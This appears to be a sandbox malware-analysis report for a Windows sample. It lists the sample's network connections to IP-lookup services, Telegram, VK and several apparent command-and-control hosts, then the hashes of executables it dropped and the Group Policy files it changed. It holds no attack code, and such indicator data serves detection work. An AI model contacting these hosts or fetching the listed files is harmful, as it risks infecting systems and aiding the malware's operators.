US 8.8.8.8:53 sun9-48.userapi.com udp
RU 87.240.132.72:443 vk.com tcp
RU 87.240.185.151:443 sun9-48.userapi.com tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:443 vk.com tcp
US 8.8.8.8:53 sun6-23.userapi.com udp
RU 95.142.206.3:443 sun6-23.userapi.com tcp
NL 45.15.156.229:80 45.15.156.229 tcp
US 172.67.75.163:443 api.myip.com tcp
NL 94.142.138.113:80 94.142.138.113 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 iplis.ru udp
DE 148.251.234.93:443 iplis.ru tcp
DE 148.251.234.93:443 iplis.ru tcp
US 8.8.8.8:53 iplogger.org udp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
NL 194.169.175.128:50505 tcp
BG 193.42.32.118:80 193.42.32.118 tcp
NL 194.169.175.128:50500 tcp
US 8.8.8.8:53 api.myip.com udp
US 8.8.8.8:53 telegram.org udp
US 8.8.8.8:53 ipinfo.io udp
NL 45.15.156.229:80 45.15.156.229 tcp
US 104.26.8.59:443 api.myip.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 8.8.8.8:53 telegram.org udp
NL 149.154.167.99:443 telegram.org tcp
US 8.8.8.8:53 vk.com udp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
US 8.8.8.8:53 db-ip.com udp
US 172.67.75.166:443 db-ip.com tcp
RU 93.186.225.194:80 vk.com tcp
NL 149.154.167.99:443 telegram.org tcp
US 8.8.8.8:53 api64.ipify.org udp
US 64.185.227.155:443 api64.ipify.org tcp
US 8.8.8.8:53 www.maxmind.com udp
US 104.18.146.235:80 www.maxmind.com tcp
US 8.8.8.8:53 twitter.com udp
US 64.185.227.155:443 api64.ipify.org tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 yandex.ru udp
RU 77.88.55.88:443 yandex.ru tcp
US 34.117.59.81:443 ipinfo.io tcp
US 172.67.75.166:443 db-ip.com tcp
US 104.18.146.235:80 www.maxmind.com tcp
US 104.18.146.235:443 www.maxmind.com tcp
US 104.18.146.235:443 www.maxmind.com tcp
US 104.18.146.235:443 www.maxmind.com tcp
US 104.18.146.235:443 www.maxmind.com tcp
US 8.8.8.8:53 api.2ip.ua udp
US 8.8.8.8:53 elijahdiego.top udp
BG 193.42.32.118:80 193.42.32.118 tcp
US 8.8.8.8:53 dzen.ru udp
RU 62.217.160.2:443 dzen.ru tcp
US 8.8.8.8:53 google.com udp
NL 142.250.179.142:443 google.com tcp
US 188.114.96.0:443 api.2ip.ua tcp
DE 45.132.1.20:80 elijahdiego.top tcp
RU 93.186.225.194:443 vk.com tcp
DE 45.132.1.20:80 elijahdiego.top tcp
DE 45.132.1.20:80 elijahdiego.top tcp
BG 171.22.28.226:80 171.22.28.226 tcp
DE 45.132.1.20:80 elijahdiego.top tcp
DE 45.132.1.20:80 elijahdiego.top tcp
US 8.8.8.8:53 www.microsoft.com udp
BG 171.22.28.226:80 171.22.28.226 tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
NL 185.225.75.171:22233 tcp
GB 145.239.200.147:30225 tcp
NL 194.169.175.232:45451 tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
NL 45.15.156.229:80 45.15.156.229 tcp
RU 93.186.225.194:80 vk.com tcp
DE 45.9.74.80:80 45.9.74.80 tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:443 vk.com tcp
DE 45.132.1.20:80 elijahdiego.top tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 8.8.8.8:53 sun6-21.userapi.com udp
RU 95.142.206.1:443 sun6-21.userapi.com tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
DE 45.132.1.20:80 elijahdiego.top tcp
NL 149.154.167.99:443 telegram.org tcp
DE 45.132.1.20:80 elijahdiego.top tcp
NL 149.154.167.99:443 telegram.org tcp
BG 193.42.32.118:80 193.42.32.118 tcp
US 104.244.42.1:443 twitter.com tcp
DE 45.132.1.20:80 elijahdiego.top tcp
US 104.244.42.1:443 twitter.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:443 vk.com tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
FI 77.91.124.55:19071 tcp
DE 45.132.1.20:80 elijahdiego.top tcp
BG 193.42.32.118:80 193.42.32.118 tcp
DE 45.132.1.20:80 elijahdiego.top tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
NL 45.15.156.229:80 45.15.156.229 tcp
US 188.114.96.0:443 api.2ip.ua tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
US 8.8.8.8:53 www.facebook.com udp
DE 45.132.1.20:80 elijahdiego.top tcp
DE 45.9.74.80:80 45.9.74.80 tcp
US 8.8.8.8:53 galandskiyher5.com udp
NL 194.169.175.127:80 galandskiyher5.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
DE 45.132.1.20:80 elijahdiego.top tcp
DE 45.132.1.20:80 elijahdiego.top tcp
DE 45.132.1.20:80 elijahdiego.top tcp
US 8.8.8.8:53 foxandcatbet.org udp
US 172.67.142.109:443 foxandcatbet.org tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
US 8.8.8.8:53 rangeroverfan.org udp
US 188.114.97.0:443 rangeroverfan.org tcp
DE 45.132.1.20:80 elijahdiego.top tcp
DE 45.132.1.20:80 elijahdiego.top tcp
DE 45.132.1.20:80 elijahdiego.top tcp
RU 79.137.192.18:80 79.137.192.18 tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 104.244.42.1:443 twitter.com tcp
DE 45.132.1.20:80 elijahdiego.top tcp
US 8.8.8.8:53 www.facebook.com udp
US 104.244.42.1:443 twitter.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
US 8.8.8.8:53 crls.pki.goog udp
NL 142.251.36.35:80 crls.pki.goog tcp
NL 142.251.36.35:80 crls.pki.goog tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 8.8.8.8:53 mikolyda.beget.tech udp
RU 91.106.207.50:80 mikolyda.beget.tech tcp
FI 77.91.68.29:80 77.91.68.29 tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 hoffmanlevi.space udp
RU 45.130.41.106:443 hoffmanlevi.space tcp
US 8.8.8.8:53 apps.identrust.com udp
NL 88.221.25.153:80 apps.identrust.com tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
US 8.8.8.8:53 facebook.com udp
GB 157.240.221.35:443 facebook.com tcp
GB 157.240.221.16:443 static.xx.fbcdn.net tcp
GB 157.240.221.16:443 static.xx.fbcdn.net tcp
GB 157.240.221.35:443 facebook.com tcp
GB 157.240.221.16:443 static.xx.fbcdn.net tcp
GB 157.240.221.16:443 static.xx.fbcdn.net tcp
GB 157.240.221.16:443 static.xx.fbcdn.net tcp
GB 157.240.221.16:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 fbcdn.net udp
GB 157.240.221.35:443 fbcdn.net tcp
GB 157.240.221.35:443 fbcdn.net tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
RU 45.130.41.106:443 hoffmanlevi.space tcp
GB 157.240.221.16:443 static.xx.fbcdn.net tcp
GB 157.240.221.16:443 static.xx.fbcdn.net tcp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 fbsbx.com udp
GB 157.240.221.35:443 fbsbx.com tcp
GB 157.240.221.35:443 fbsbx.com tcp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 telegram.org udp
NL 149.154.167.99:443 telegram.org tcp
FI 77.91.68.52:80 77.91.68.52 tcp
NL 149.154.167.99:443 telegram.org tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
FI 77.91.68.29:80 77.91.68.29 tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp

Files

memory/1468-0-0x000000013FB70000-0x000000014020B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab3610.tmp

MD5 f3441b8572aae8801c04f3060b550443
SHA1 4ef0a35436125d6821831ef36c28ffaf196cda15
SHA256 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA512 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

C:\Users\Admin\AppData\Local\Temp\Tar37E7.tmp

MD5 9441737383d21192400eca82fda910ec
SHA1 725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256 bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA512 7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

C:\Users\Admin\Pictures\Minor Policy\RxOQCm7grqMZ61Vr_46oGvts.exe

MD5 5aa38295da76c7810a946e570d8fe083
SHA1 e308b69c06c2655f8aa1f550dfaef9388163963a
SHA256 78e6096326c837b23be4519087c4f920a0e5c0b3dca3a407e926a8d3940bde2f
SHA512 e4b610bb3c5e6ed7a93323e9e248f7de81dd4d7a61fe2896cc25e30924217f1d9519409c76118a47acb99ad46d1c2ed3893164dd3e883402b1ee725abcd6f8ab

C:\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe

MD5 f1fb98c3d7d9b773b9f4733cedca1cd7
SHA1 41cdbb3409d661bc1ae9a922a525e0012c551d5d
SHA256 525b46b9c510675b05a76d96af37c5f3ad182fce29df1115a3d480afceb871bc
SHA512 6f7255f5de9936c0413b0b1c9c21d6b9326a2473f29f9950815206b92d892db7ba305c1ad87abf9b579a75bc1d9b09c77f566d5996b51bfa60557ab36c488268

C:\Users\Admin\Pictures\Minor Policy\ch5c8B5ZdA4rJTdsnDNjoJVN.exe

MD5 d852aed84489b36f5d6b0f6a075cafd6
SHA1 73a175bbf684f85881b6d27d3551d0d6e734d6df
SHA256 9d1e08892c14289ddbc966d9f1da12c36d9e21b2c8803532819e0e048c4c6274
SHA512 dea771a5502bee275531da3634775433eff6fefdce2c4ddceb8762b95efc6718edcc714eac705481109acd8c6ef9c139b3ad7e91e6723d38203b0d9995746ad4

C:\Users\Admin\Pictures\Minor Policy\p0Md4MBiYJc6SgyciNphhNUh.exe

MD5 b9a096baebdf8e44368e9724da8e56dd
SHA1 f9873fa92ae8b75e23e353f43ae1ba9087edebfc
SHA256 2157d146a890d32c5ba49f31fa1840e5b0d56e4dd0bbf5f8b14cc4e482a47bef
SHA512 f17ee70d827fba12de17062add350df0803009e5b930a0f0a7891e6bf64f0df8f443355ec72ae332aed3b37d24f40c78e0a559040e45994e02e3a5ad71624b08

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E1993F15A3402D743FF8169CEB684DD3

MD5 d056c7ed1f4352765c2a64d94735590d
SHA1 583d42c202d4a1f7993ba1cf637c5350978dfa91
SHA256 bcb2e1ce694f498fb6ec7cd4ca7c258faaf0be566fffbc78b8eaebdfb06a5486
SHA512 3475af7c4fe3ef6ac3c442354c9381cfa36734c563172c5a2f2aeefc5830dabcab02518e41cb4cd135425b9daa0206f012f49a7f75568eb040d2331fd02e4499

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E1993F15A3402D743FF8169CEB684DD3

MD5 2d459b176b30094a41471f48dfc007a1
SHA1 3c6614225ddcc5a331e8439c05af40d610a05d3b
SHA256 5ba424599a34daee94c313b9d5490249543e068b76d5634688504e2a8cb729fe
SHA512 c6655a4141638dc8fa0822af2502fab22d669f76ee59775c31bffc8be174a22a3ffb911651f7244191b417b14aa506069943b157b7398c43a2b6fd889e953f92

C:\Users\Admin\Pictures\Minor Policy\ZW9r6_Jcut69xZ7q3DByCddi.exe

MD5 3d683bae0039e46ad50bebf4681785a0
SHA1 e8662a8cf438ec8521d71dc8b431c1ba592bd881
SHA256 e69e93cc1b989513d5bb4660d326f2e9aea09f903781ef9bdcbbbe2c24dbcc58
SHA512 f85f57d9299f4dafc3b5101af37d6f4c57ae8db23fa1a6aa1b2df37ae655d157b16b4177b9f6e45d0497a14b56451d37e123e6225ca4ed44070183d182ad563e

C:\Users\Admin\Pictures\Minor Policy\RxOQCm7grqMZ61Vr_46oGvts.exe

MD5 5aa38295da76c7810a946e570d8fe083
SHA1 e308b69c06c2655f8aa1f550dfaef9388163963a
SHA256 78e6096326c837b23be4519087c4f920a0e5c0b3dca3a407e926a8d3940bde2f
SHA512 e4b610bb3c5e6ed7a93323e9e248f7de81dd4d7a61fe2896cc25e30924217f1d9519409c76118a47acb99ad46d1c2ed3893164dd3e883402b1ee725abcd6f8ab

C:\Users\Admin\Pictures\Minor Policy\ch5c8B5ZdA4rJTdsnDNjoJVN.exe

MD5 d852aed84489b36f5d6b0f6a075cafd6
SHA1 73a175bbf684f85881b6d27d3551d0d6e734d6df
SHA256 9d1e08892c14289ddbc966d9f1da12c36d9e21b2c8803532819e0e048c4c6274
SHA512 dea771a5502bee275531da3634775433eff6fefdce2c4ddceb8762b95efc6718edcc714eac705481109acd8c6ef9c139b3ad7e91e6723d38203b0d9995746ad4

C:\Users\Admin\Pictures\Minor Policy\p0Md4MBiYJc6SgyciNphhNUh.exe

MD5 b9a096baebdf8e44368e9724da8e56dd
SHA1 f9873fa92ae8b75e23e353f43ae1ba9087edebfc
SHA256 2157d146a890d32c5ba49f31fa1840e5b0d56e4dd0bbf5f8b14cc4e482a47bef
SHA512 f17ee70d827fba12de17062add350df0803009e5b930a0f0a7891e6bf64f0df8f443355ec72ae332aed3b37d24f40c78e0a559040e45994e02e3a5ad71624b08

C:\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe

MD5 f1fb98c3d7d9b773b9f4733cedca1cd7
SHA1 41cdbb3409d661bc1ae9a922a525e0012c551d5d
SHA256 525b46b9c510675b05a76d96af37c5f3ad182fce29df1115a3d480afceb871bc
SHA512 6f7255f5de9936c0413b0b1c9c21d6b9326a2473f29f9950815206b92d892db7ba305c1ad87abf9b579a75bc1d9b09c77f566d5996b51bfa60557ab36c488268

C:\Users\Admin\Pictures\Minor Policy\8of3DRmQjWCjBhE2NNvN6ur1.exe

MD5 487d3214ced555a38e0b13dd37285ade
SHA1 656a5891bff67714d6583c2c2e484b0de721d09c
SHA256 f347898a48829ec52d4bb0e18458cd23ce04f5af5d81c80363fdc15c3b4c77f8
SHA512 3a3ca5578861186b1773f1cf50e6d9ae9dbac0aafa17ad227f65b2593c5a408e50f46aea56d03bc8b85f4500b4228540a1ee0c80644b8f0c4305f0352a0e4163

C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe

MD5 df71a06b859776129a744f9dbfddc401
SHA1 a8823e2b086fc4c9e5b148ad6cd29f095da05337
SHA256 d2fb526d868cb4488157564ae891059160b4349d550a291398b3d48ae28b2681
SHA512 76fe69a046f470ca013af39c92a40fff7d6b7a7ad236ea9466d87bbdeac3537d2f1a7544ee5eb1bf179506b780ba0c5fc05f45146befbab12bca1144f21362df

memory/1492-209-0x0000000000400000-0x0000000000AFF000-memory.dmp

C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe

MD5 eede39c7c0198e86a3b75d2b8af77201
SHA1 b4545ddfbf9a70674a3f28aafe7abf7b4828b9f1
SHA256 7d61b2faaa4ca4c6a3ace89ab8a514c1d928492f4e41552b0386ccf7506d6727
SHA512 31698efaf32fca4bacbf7eef3c51b1db1350ea6768c498e859feea0dc610b3fdce8f5f1691279807088aa0a94eb61578bc6082840312dd17f8910ba7dd6f240d

\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe

MD5 f1fb98c3d7d9b773b9f4733cedca1cd7
SHA1 41cdbb3409d661bc1ae9a922a525e0012c551d5d
SHA256 525b46b9c510675b05a76d96af37c5f3ad182fce29df1115a3d480afceb871bc
SHA512 6f7255f5de9936c0413b0b1c9c21d6b9326a2473f29f9950815206b92d892db7ba305c1ad87abf9b579a75bc1d9b09c77f566d5996b51bfa60557ab36c488268

\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe

MD5 eede39c7c0198e86a3b75d2b8af77201
SHA1 b4545ddfbf9a70674a3f28aafe7abf7b4828b9f1
SHA256 7d61b2faaa4ca4c6a3ace89ab8a514c1d928492f4e41552b0386ccf7506d6727
SHA512 31698efaf32fca4bacbf7eef3c51b1db1350ea6768c498e859feea0dc610b3fdce8f5f1691279807088aa0a94eb61578bc6082840312dd17f8910ba7dd6f240d

C:\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe

MD5 f1fb98c3d7d9b773b9f4733cedca1cd7
SHA1 41cdbb3409d661bc1ae9a922a525e0012c551d5d
SHA256 525b46b9c510675b05a76d96af37c5f3ad182fce29df1115a3d480afceb871bc
SHA512 6f7255f5de9936c0413b0b1c9c21d6b9326a2473f29f9950815206b92d892db7ba305c1ad87abf9b579a75bc1d9b09c77f566d5996b51bfa60557ab36c488268

C:\Users\Admin\Pictures\Minor Policy\ZW9r6_Jcut69xZ7q3DByCddi.exe

MD5 3d683bae0039e46ad50bebf4681785a0
SHA1 e8662a8cf438ec8521d71dc8b431c1ba592bd881
SHA256 e69e93cc1b989513d5bb4660d326f2e9aea09f903781ef9bdcbbbe2c24dbcc58
SHA512 f85f57d9299f4dafc3b5101af37d6f4c57ae8db23fa1a6aa1b2df37ae655d157b16b4177b9f6e45d0497a14b56451d37e123e6225ca4ed44070183d182ad563e

C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe

MD5 15a8142992786ff28bb79fb2b7d47f6e
SHA1 c5fb299009599c93fef087734e13f1dc195f8ec1
SHA256 9a203a1f050818238d950b70465e679c6475cf974e7c823d188645ba6aec01ae
SHA512 aba1c44e1e893364a7e9f0f896d205c24949f77a3d0a64dd7883768a5e3ee43771812fe7ec57dcbc39fd218b643f621f11f7738e0c1be2cd647f353b8b245743

C:\Users\Admin\Pictures\Minor Policy\8of3DRmQjWCjBhE2NNvN6ur1.exe

MD5 487d3214ced555a38e0b13dd37285ade
SHA1 656a5891bff67714d6583c2c2e484b0de721d09c
SHA256 f347898a48829ec52d4bb0e18458cd23ce04f5af5d81c80363fdc15c3b4c77f8
SHA512 3a3ca5578861186b1773f1cf50e6d9ae9dbac0aafa17ad227f65b2593c5a408e50f46aea56d03bc8b85f4500b4228540a1ee0c80644b8f0c4305f0352a0e4163

C:\Users\Admin\Pictures\Minor Policy\ZW9r6_Jcut69xZ7q3DByCddi.exe

MD5 3d683bae0039e46ad50bebf4681785a0
SHA1 e8662a8cf438ec8521d71dc8b431c1ba592bd881
SHA256 e69e93cc1b989513d5bb4660d326f2e9aea09f903781ef9bdcbbbe2c24dbcc58
SHA512 f85f57d9299f4dafc3b5101af37d6f4c57ae8db23fa1a6aa1b2df37ae655d157b16b4177b9f6e45d0497a14b56451d37e123e6225ca4ed44070183d182ad563e

C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe

MD5 df71a06b859776129a744f9dbfddc401
SHA1 a8823e2b086fc4c9e5b148ad6cd29f095da05337
SHA256 d2fb526d868cb4488157564ae891059160b4349d550a291398b3d48ae28b2681
SHA512 76fe69a046f470ca013af39c92a40fff7d6b7a7ad236ea9466d87bbdeac3537d2f1a7544ee5eb1bf179506b780ba0c5fc05f45146befbab12bca1144f21362df

C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe

MD5 15a8142992786ff28bb79fb2b7d47f6e
SHA1 c5fb299009599c93fef087734e13f1dc195f8ec1
SHA256 9a203a1f050818238d950b70465e679c6475cf974e7c823d188645ba6aec01ae
SHA512 aba1c44e1e893364a7e9f0f896d205c24949f77a3d0a64dd7883768a5e3ee43771812fe7ec57dcbc39fd218b643f621f11f7738e0c1be2cd647f353b8b245743

C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe

MD5 6e3bab6e7b0eb009239eb642eb9d1764
SHA1 41e3d97c275cbb297a55f3c157454dc830697fa1
SHA256 2426765453363274d0b6a02eecd38a159738c106104b07f1df252099822a395e
SHA512 0ebab8f1ebe80d2333a32f0f5bb97a80cb2085ce7eebc20d5aa0a35c2d2b24f4515f783565f9871d668740c7dc599b14c8fb1f7ac288a27fe503b4f91c2d3ec0

memory/1076-219-0x0000000000340000-0x00000000003D2000-memory.dmp

C:\Windows\System32\GroupPolicy\gpt.ini

MD5 7cc972a3480ca0a4792dc3379a763572
SHA1 f72eb4124d24f06678052706c542340422307317
SHA256 02ad5d151250848f2cc4b650a351505aa58ac13c50da207cc06295c123ddf5e5
SHA512 ff5f320356e59eaf8f2b7c5a2668541252221be2d9701006fcc64ce802e66eeaf6ecf316d925258eb12ee5b8b7df4f8da075e9524badc0024b55fae639d075b7

C:\Windows\System32\GroupPolicy\Machine\Registry.pol

MD5 cdfd60e717a44c2349b553e011958b85
SHA1 431136102a6fb52a00e416964d4c27089155f73b
SHA256 0ee08da4da3e4133e1809099fc646468e7156644c9a772f704b80e338015211f
SHA512 dfea0d0b3779059e64088ea9a13cd6b076d76c64db99fa82e6612386cae5cda94a790318207470045ef51f0a410b400726ba28cb6ecb6972f081c532e558d6a8

C:\Windows\System32\GroupPolicy\gpt.ini

MD5 7cc972a3480ca0a4792dc3379a763572
SHA1 f72eb4124d24f06678052706c542340422307317
SHA256 02ad5d151250848f2cc4b650a351505aa58ac13c50da207cc06295c123ddf5e5
SHA512 ff5f320356e59eaf8f2b7c5a2668541252221be2d9701006fcc64ce802e66eeaf6ecf316d925258eb12ee5b8b7df4f8da075e9524badc0024b55fae639d075b7

memory/2020-220-0x0000000000070000-0x00000000006A3000-memory.dmp

C:\Users\Admin\Pictures\Minor Policy\S3G8zb34YK75eg8vIvwnsVI2.exe

MD5 1c05ce269187a688ceb10901bc39fce3
SHA1 ea0d9e0c5392d6b07770e7e9677660aac4f5387e
SHA256 c0de80877d3bd743ea80f7c8a2f7370a4fd18713e7661049549867ab909f0c98
SHA512 1bc710876b4910f2b54ab56c1288dbb94a2dd1d47c64b27d7ae822438f9db4ee4ef0f63e5b1ddeb9e8008b9ac5f5ae7faa5a300694958dc614dbc7814fbb7cd6

C:\Users\Admin\Pictures\Minor Policy\S3G8zb34YK75eg8vIvwnsVI2.exe

MD5 1c05ce269187a688ceb10901bc39fce3
SHA1 ea0d9e0c5392d6b07770e7e9677660aac4f5387e
SHA256 c0de80877d3bd743ea80f7c8a2f7370a4fd18713e7661049549867ab909f0c98
SHA512 1bc710876b4910f2b54ab56c1288dbb94a2dd1d47c64b27d7ae822438f9db4ee4ef0f63e5b1ddeb9e8008b9ac5f5ae7faa5a300694958dc614dbc7814fbb7cd6

memory/2516-228-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe

MD5 15a8142992786ff28bb79fb2b7d47f6e
SHA1 c5fb299009599c93fef087734e13f1dc195f8ec1
SHA256 9a203a1f050818238d950b70465e679c6475cf974e7c823d188645ba6aec01ae
SHA512 aba1c44e1e893364a7e9f0f896d205c24949f77a3d0a64dd7883768a5e3ee43771812fe7ec57dcbc39fd218b643f621f11f7738e0c1be2cd647f353b8b245743

C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe

MD5 6e3bab6e7b0eb009239eb642eb9d1764
SHA1 41e3d97c275cbb297a55f3c157454dc830697fa1
SHA256 2426765453363274d0b6a02eecd38a159738c106104b07f1df252099822a395e
SHA512 0ebab8f1ebe80d2333a32f0f5bb97a80cb2085ce7eebc20d5aa0a35c2d2b24f4515f783565f9871d668740c7dc599b14c8fb1f7ac288a27fe503b4f91c2d3ec0

C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe

MD5 15a8142992786ff28bb79fb2b7d47f6e
SHA1 c5fb299009599c93fef087734e13f1dc195f8ec1
SHA256 9a203a1f050818238d950b70465e679c6475cf974e7c823d188645ba6aec01ae
SHA512 aba1c44e1e893364a7e9f0f896d205c24949f77a3d0a64dd7883768a5e3ee43771812fe7ec57dcbc39fd218b643f621f11f7738e0c1be2cd647f353b8b245743

memory/2516-230-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe

MD5 6e3bab6e7b0eb009239eb642eb9d1764
SHA1 41e3d97c275cbb297a55f3c157454dc830697fa1
SHA256 2426765453363274d0b6a02eecd38a159738c106104b07f1df252099822a395e
SHA512 0ebab8f1ebe80d2333a32f0f5bb97a80cb2085ce7eebc20d5aa0a35c2d2b24f4515f783565f9871d668740c7dc599b14c8fb1f7ac288a27fe503b4f91c2d3ec0

memory/1076-239-0x0000000002E70000-0x0000000002F8B000-memory.dmp

memory/1076-238-0x0000000000340000-0x00000000003D2000-memory.dmp

memory/2796-240-0x0000000000100000-0x0000000000101000-memory.dmp

memory/2796-242-0x0000000000100000-0x0000000000101000-memory.dmp

memory/2796-244-0x0000000000100000-0x0000000000101000-memory.dmp

memory/2796-245-0x0000000000110000-0x0000000000111000-memory.dmp

memory/2796-247-0x0000000000110000-0x0000000000111000-memory.dmp

memory/2796-249-0x0000000000110000-0x0000000000111000-memory.dmp

memory/2796-250-0x0000000000160000-0x0000000000161000-memory.dmp

memory/2796-252-0x0000000000160000-0x0000000000161000-memory.dmp

memory/2796-254-0x0000000000160000-0x0000000000161000-memory.dmp

memory/2796-257-0x0000000000170000-0x0000000000171000-memory.dmp

memory/2796-259-0x0000000000170000-0x0000000000171000-memory.dmp

memory/2796-262-0x0000000000180000-0x0000000000181000-memory.dmp

memory/2796-264-0x0000000000180000-0x0000000000181000-memory.dmp

memory/2796-267-0x0000000000190000-0x0000000000191000-memory.dmp

memory/2796-269-0x0000000000190000-0x0000000000191000-memory.dmp

memory/2796-272-0x00000000001A0000-0x00000000001A1000-memory.dmp

memory/2796-274-0x00000000001A0000-0x00000000001A1000-memory.dmp

memory/2796-275-0x0000000000940000-0x0000000001484000-memory.dmp

C:\Users\Admin\Pictures\Minor Policy\S3G8zb34YK75eg8vIvwnsVI2.exe

MD5 1c05ce269187a688ceb10901bc39fce3
SHA1 ea0d9e0c5392d6b07770e7e9677660aac4f5387e
SHA256 c0de80877d3bd743ea80f7c8a2f7370a4fd18713e7661049549867ab909f0c98
